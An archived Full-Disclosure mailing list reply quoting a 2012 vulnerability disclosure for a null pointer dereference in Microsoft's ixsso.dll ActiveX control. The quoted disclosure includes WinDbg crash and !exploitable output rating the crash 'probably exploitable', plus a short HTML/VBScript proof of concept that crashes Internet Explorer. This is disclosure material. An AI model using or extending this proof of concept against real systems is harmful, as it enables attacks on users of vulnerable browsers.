lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <00a701cd877a$2e2ad010$8a807030$@itsecuritypros.org>
Date: Fri, 31 Aug 2012 09:11:49 -0400
From: "Michael D. Wood" <mike@...ecuritypros.org>
To: "'kaveh ghaemmaghami'" <kavehghaemmaghami@...glemail.com>,
	<full-disclosure@...ts.grok.org.uk>
Subject: Re: Microsoft Indexing Service
	Server-side	(ixsso.dll) null pointer dereference

Version: 5.1.2600.5512
Tested on: windows XP Sp3 ENG

Did you do any tests on different versions of IE or?

--
Michael D. Wood
ITSecurityPros.org
www.itsecuritypros.org


-----Original Message-----
From: full-disclosure-bounces@...ts.grok.org.uk
[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of kaveh
ghaemmaghami
Sent: Friday, August 24, 2012 5:04 AM
To: full-disclosure@...ts.grok.org.uk
Subject: [Full-disclosure] Microsoft Indexing Service Server-side
(ixsso.dll) null pointer dereference

Exploit Title: Microsoft Indexing Service Server-side (ixsso.dll) null
pointer dereference Crash :
http://img836.imageshack.us/img836/7742/microsoftf.png
Date: 2012-08-24
Author: coolkaveh
coolkaveh@...ketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://http://www.microsoft.com/
Version: 5.1.2600.5512
Tested on: windows XP Sp3 ENG
Greets To Mohammad Morteza Sanaie
sanaie.morteza@...il.com
----------------------------------------------------------------------------
-------------
Class CissoQuery
GUID: {A4463024-2B6F-11D0-BFBC-0020F8008024}
Number of Interfaces: 1
Default Interface: IixssoQuery
RegKey Safe for Script: True
RegkeySafe for Init: True
----------------------------------------------------------------------------
-------------
Report for Clsid: {A4463024-2B6F-11D0-BFBC-0020F8008024}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller
----------------------------------------------------------------------------
-------------
(c8c.85c): Access violation - code c0000005 (first chance) First chance
exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02e126d0 ecx=774fef18 edx=0020e5ea esi=0020e5c4
edi=00000000
eip=65da3d35 esp=02a4f070 ebp=02a4f098 iopl=0         nv up ei ng nz na pe
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010286
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\WINDOWS\system32\ixsso.dll -
ixsso!DllCanUnloadNow+0xeac:
65da3d35 8b08            mov     ecx,dword ptr [eax]
ds:0023:00000000=????????
Missing image name, possible paged-out or corrupt data.
0:012> !load winext\msec.dll
0:012> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine Event
Type: Exception
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\WINDOWS\system32\OLEAUT32.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\WINDOWS\system32\mshtml.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\WINDOWS\system32\vbscript.dll - Exception Faulting Address: 0x0 First
Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception
Sub-Type: Read Access Violation

Faulting Instruction:65da3d35 mov ecx,dword ptr [eax]

Basic Block:
65da3d35 mov ecx,dword ptr [eax]
Tainted Input Operands: eax
65da3d37 lea edx,[ebp+8]
65da3d3a push edx
65da3d3b push offset ixsso+0x1400 (65da1400)
65da3d40 push eax
Tainted Input Operands: eax
65da3d41 mov dword ptr [ebp+8],edi
65da3d44 mov dword ptr [ebp-0ch],edi
65da3d47 mov dword ptr [ebp-8],edi
65da3d4a mov dword ptr [ebp-4],edi
65da3d4d call dword ptr [ecx]
Tainted Input Operands: ecx, StackContents

Exception Hash (Major/Minor): 0x3716130a.0x43133e77

Stack Trace:
ixsso!DllCanUnloadNow+0xeac
OLEAUT32!DispCallFunc+0xc3
OLEAUT32!DispCallFunc+0x6d2
OLEAUT32!DispInvoke+0x23
ixsso!DllCanUnloadNow+0x391
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc86d3
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8ce9
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8736
vbscript!DllGetClassObject+0x12b6d
vbscript!DllGetClassObject+0x12ae0
vbscript!DllGetClassObject+0x12a81
vbscript+0x3da8
vbscript+0x40bf
vbscript+0x6412
vbscript+0x6397
vbscript+0x6bed
vbscript+0x6de5
vbscript!DllCanUnloadNow+0x15b6
vbscript+0xa306
mshtml+0xa195b
mshtml+0xa1804
mshtml+0xa18f0
mshtml+0xa06f5
Instruction Address: 0x0000000065da3d35

Description: Data from Faulting Address controls Code Flow Short
Description: TaintedDataControlsCodeFlow Exploitability Classification:
PROBABLY_EXPLOITABLE Recommended Bug Title: Probably Exploitable - Data from
Faulting Address controls Code Flow starting at
ixsso!DllCanUnloadNow+0x0000000000000eac (Hash=0x3716130a.0x43133e77)

The data from the faulting address is later used as the target for a branch.
----------------------------------------------------------------------------
----------------------------------------------------------------------------
<html>
Exploit
<object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024'
id='target' /></object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\ixsso.dll"
prototype  = "Property Let OnStartPage As object"
memberName = "OnStartPage"
progid     = "Cisso.CissoQuery"
argCount   = 1

Set arg1=Nothing

target.OnStartPage arg1
</script>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Download attachment "smime.p7s" of type "application/pkcs7-signature" (6139 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists